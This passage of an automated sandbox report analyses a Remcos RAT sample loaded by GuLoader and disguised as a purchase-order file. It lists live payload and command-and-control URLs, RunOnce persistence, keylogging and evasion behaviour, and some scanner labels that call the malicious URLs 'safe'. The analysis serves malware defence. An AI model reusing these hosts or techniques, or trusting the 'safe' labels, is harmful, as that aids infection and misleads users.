            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.0000000006498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`O
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.00000000064EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4371
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4599
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_6FBB1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBB1BFF
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeProcess created: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"Jump to behavior
            Source: Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324734721.0000000006508000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3324734721.0000000006502000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order No.5817-0001142025.bat.exe PID: 6720, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

            Remote Access Functionality

            barindex
            Source: C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIGJump to behavior
            Source: Yara matchFile source: 00000004.00000002.3324734721.0000000006502000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order No.5817-0001142025.bat.exe PID: 6720, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            11
            Masquerading
            11
            Input Capture
            31
            Security Software Discovery
            Remote Services11
            Input Capture
            11
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            12
            Process Injection
            1
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            1
            Remote Access Software
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin Shares1
            Clipboard Data
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            12
            Process Injection
            NTDS3
            File and Directory Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets23
            System Information Discovery
            SSHKeylogging113
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Purchase Order No.5817-0001142025.bat.exe36%VirustotalBrowse
            Purchase Order No.5817-0001142025.bat.exe61%ReversingLabsWin32.Backdoor.Remcos
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.bat61%ReversingLabsWin32.Backdoor.Remcos
            C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://teldrum.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
            https://teldrum.ro/0%Avira URL Cloudsafe
            https://teldrum.ro/NJrdZqNcCtz102.binFysisNoncrestereamuschilor.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
            linktreewealth.zapto.org0%Avira URL Cloudsafe
            https://teldrum.ro/NJrdZqNcCtz102.bintX0%Avira URL Cloudsafe
            linktreewealthy.zapto.org0%Avira URL Cloudsafe
            https://teldrum.ro/NJrdZqNcCtz102.bin(0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            linktreewealth.zapto.org
            0.0.0.0
            truefalse
              high
              teldrum.ro
              109.99.162.14
              truefalse
                high
                linktreewealthy.zapto.org
                0.0.0.0
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  linktreewealth.zapto.orgtrue
                  • Avira URL Cloud: safe
                  unknown
                  linktreewealthy.zapto.orgtrue
                  • Avira URL Cloud: safe
                  unknown
                  https://teldrum.ro/NJrdZqNcCtz102.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdPurchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                    high
                    http://www.ftp.ftp://ftp.gopher.Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      high
                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdPurchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                        high
                        https://teldrum.ro/NJrdZqNcCtz102.binFysisNoncrestereamuschilor.ro/NJrdZqNcCtz102.binPurchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324792828.0000000006720000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nsis.sf.net/NSIS_ErrorErrorPurchase Order No.5817-0001142025.bat.exe, Emotionalizes.bat.4.drfalse
                          high
                          https://teldrum.ro/NJrdZqNcCtz102.bintXPurchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.00000000064D6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://teldrum.ro/NJrdZqNcCtz102.bin(Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.0000000006498000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://teldrum.ro/Purchase Order No.5817-0001142025.bat.exe, 00000004.00000002.3324633416.0000000006498000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Purchase Order No.5817-0001142025.bat.exe, 00000004.00000001.3093242051.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            109.99.162.14
                            teldrum.roRomania
                            9050RTDBucharestRomaniaROfalse
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1592409
                            Start date and time:2025-01-16 05:09:09 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 31s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Purchase Order No.5817-0001142025.bat.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/10@3/1
                            EGA Information:
                            • Successful, ratio: 50%
                            HCA Information:
                            • Successful, ratio: 85%
                            • Number of executed functions: 46
                            • Number of non-executed functions: 35
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            05:11:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce jezebelish C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.bat
                            05:12:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce jezebelish C:\Users\user\AppData\Local\Temp\Burrower\Emotionalizes.bat
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            109.99.162.14oXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                              2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                    x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                            z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                linktreewealth.zapto.orginward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 0.0.0.0
                                                x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 43.226.229.209
                                                LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 43.226.229.209
                                                2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 43.226.229.209
                                                teldrum.rooXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                                                • 109.99.162.14
                                                2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                                • 109.99.162.14
                                                inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                                • 109.99.162.14
                                                x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                • 109.99.162.14
                                                z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                RTDBucharestRomaniaROboatnet.arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                • 80.97.224.164
                                                bot.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 86.34.169.190
                                                i486.elfGet hashmaliciousMiraiBrowse
                                                • 109.99.197.55
                                                oXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                                                • 109.99.162.14
                                                2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                                • 109.99.162.14
                                                inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                ppc.elfGet hashmaliciousUnknownBrowse
                                                • 80.97.224.140
                                                BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                                • 109.99.162.14
                                                x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 109.99.162.14
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19153776434-874356550.05.exeGet hashmaliciousUnknownBrowse
                                                • 109.99.162.14
                                                download.bin.exeGet hashmaliciousNjrat, XRedBrowse
                                                • 109.99.162.14
                                                Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                                                • 109.99.162.14
                                                BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                • 109.99.162.14
                                                setup.msiGet hashmaliciousUnknownBrowse
                                                • 109.99.162.14
                                                00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                                • 109.99.162.14
                                                00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                                • 109.99.162.14
                                                Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                • 109.99.162.14
                                                138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                • 109.99.162.14
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp\System.dlloXcuapa8NbGet hashmaliciousGuLoader, RemcosBrowse
                                                  2afvzKckLwGet hashmaliciousGuLoader, RemcosBrowse
                                                    inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      BppG5NgQJBGet hashmaliciousGuLoader, RemcosBrowse
                                                        x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                  2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):174
                                                                    Entropy (8bit):3.3866534665095296
                                                                    Encrypted:false
                                                                    SSDEEP:3:rglsLlFmFWPlWlClDl5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoov:MlsLlknlCb5YcIeeDAlOWAAe5q1v
                                                                    MD5:014D5CBD4E44B8322F639C52820A2107
                                                                    SHA1:BD1FC172606EB7B9E968858340758D675C58521C
                                                                    SHA-256:BAFFD9E1F798313CC3DD501136B374B90746133760E2500CD21CF3C8938E8589
                                                                    SHA-512:A9ED15CF707D6208539848944A9C32C950465C54986908C6C3D9A188A0130ABEEFF815D1D16AD6E87B5EA6ECDBA14E693F2F959225CF5D208EA66704B90419E3
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                    Reputation:low
                                                                    Preview:....[.2.0.2.5./.0.1./.1.5. .2.3.:.1.2.:.0.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].....
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):617221
                                                                    Entropy (8bit):7.756588513846525
                                                                    Encrypted:false
                                                                    SSDEEP:12288:UnPdMy8JGFmatdgxcG0F3F/eKZIhMznQJSeufSfk:EPdMvJn0tfZsMzReSck
                                                                    MD5:FB2BE2965FB21D400341518012AD4867
                                                                    SHA1:FDA727494D927E9B5919CA2B32F71A1D479F540C
                                                                    SHA-256:93E42636E6F59D02D0A756054FDADC37644C1C32DA55CDA0185E7923A8E42126
                                                                    SHA-512:4732A136C1E2E7E73F58296013A448EDCB528E2C97E664D8FFC145AE471BB323DC6F75431E611D4A2EB6A1966ED39AC772A2AFE8584063D1A531CEFEF870B89B
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.0536606896881855
                                                                    Encrypted:false
                                                                    SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                    MD5:08CA75DA54EB4810D18796C97F510A55
                                                                    SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                    SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                    SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:[Bus Clock]..Gats=Galse..
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):5.805604762622714
                                                                    Encrypted:false
                                                                    SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                    MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                    SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                    SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                    SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: oXcuapa8Nb, Detection: malicious, Browse
                                                                    • Filename: 2afvzKckLw, Detection: malicious, Browse
                                                                    • Filename: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, Detection: malicious, Browse
                                                                    • Filename: BppG5NgQJB, Detection: malicious, Browse
                                                                    • Filename: x6yDsHJ9tr.exe, Detection: malicious, Browse
                                                                    • Filename: LrBF2Z930N.exe, Detection: malicious, Browse
                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1239884
                                                                    Entropy (8bit):4.0042107461828635
                                                                    Encrypted:false
                                                                    SSDEEP:12288:6CRFMBOsWwHHzckVfAlmSDjY2nr2OrvS9CR:6CRPwHYkVfAYSvrnrZF
                                                                    MD5:F6A0F4C79300AEE752FC9FF33A1B1B4B
                                                                    SHA1:85CDF54DE234B94F1B6574F36EDF583B4D8C817E
                                                                    SHA-256:CCCB8590505B9BB0566666585DD321AA42C0EDFCBF9335AE0C0A3E0D468AB30B
                                                                    SHA-512:9D986B0FFBA43D08B5928E6632F026D2731B1F8E98A1E862094D866FE7E43BAC5F72068BE85F364CE6C41D73F3C7EE6B8F9DCD99BF3D0FF13D31C3E5529E178F
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:".......,...................X...d.......|......."...........................................................................................................................................................................................................................................G...Y...........}...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):114454
                                                                    Entropy (8bit):1.2519787240577294
                                                                    Encrypted:false
                                                                    SSDEEP:768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
                                                                    MD5:F85E20AA1A28EEFFC89F744F6B6B67B3
                                                                    SHA1:B61AEF131017C5605647983CE2D55769914BB104
                                                                    SHA-256:C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
                                                                    SHA-512:EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):310550
                                                                    Entropy (8bit):1.2527719188567612
                                                                    Encrypted:false
                                                                    SSDEEP:1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
                                                                    MD5:72FA348549D0BD9CE66E5F3EBA54DF3A
                                                                    SHA1:D5B4797D07374226CD8173964DF8753F4ABB9E6E
                                                                    SHA-256:7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
                                                                    SHA-512:D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
                                                                    Malicious:false
                                                                    Preview:...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................|....................................r.............................W.............................................X.....................................................q.................
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):200302
                                                                    Entropy (8bit):4.6062914847515835
                                                                    Encrypted:false
                                                                    SSDEEP:3072:96wsWDv0yAoceF/ujFfMvZ1zxl17/4cUAhYTgq:92oF/+Mzv1ccXCt
                                                                    MD5:5727BC0FF0B61A0D9DE62F83F4E72269
                                                                    SHA1:EC82ECBC552E8C69A76FDF1AEBE0FFFE69E865F3
                                                                    SHA-256:F386BA2EE555EE3733AEAE5641ABD2CA3E993CB513407CB602B45F1F8166D8DA
                                                                    SHA-512:16052408E86A7411C5962A225EB07AD8F49DF1994D883B337A5B85319843A05D357CF05D01B0663B9DBDB09517F1CEFFB10BBEE5434891B3424D19A0B10A4674
                                                                    Malicious:false
                                                                    Preview:...............9...........@@@@@@@.....*....hh........a........................222222..D.....~..``..Y..;...........................ddd.................X........./..........................]...:............,...........CC....uuuuu...............%..................<......)).................>>>>>................................................,,................***..+++.&&&&................e....GG........".................. .....................................!..........N.L........!!...DDDD........."""..............~~~............b...........$........[.y.lll........(..qqq............n........................H......p..........6................................e...www.B.......................................................44.XXXXX.ddd..G..................UU........www.........L.........g...AAAA.....AA.............5......uu....................xxx..........t.v...B..ff.................._.....,...................k..........__.rrr.d...................VV...........d......<<.a............WW.o......
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
                                                                    Category:dropped
                                                                    Size (bytes):267655
                                                                    Entropy (8bit):1.2559804952290619
                                                                    Encrypted:false
                                                                    SSDEEP:768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
                                                                    MD5:F6A4342C9271CFFEF29695EEA330941E
                                                                    SHA1:291ABCFA507BA730832511E5F47EAA2CB4DFABBD
                                                                    SHA-256:605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
                                                                    SHA-512:D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
                                                                    Malicious:false
                                                                    Preview:...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................
                                                                    Process:C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):327142
                                                                    Entropy (8bit):7.594926290050457
                                                                    Encrypted:false
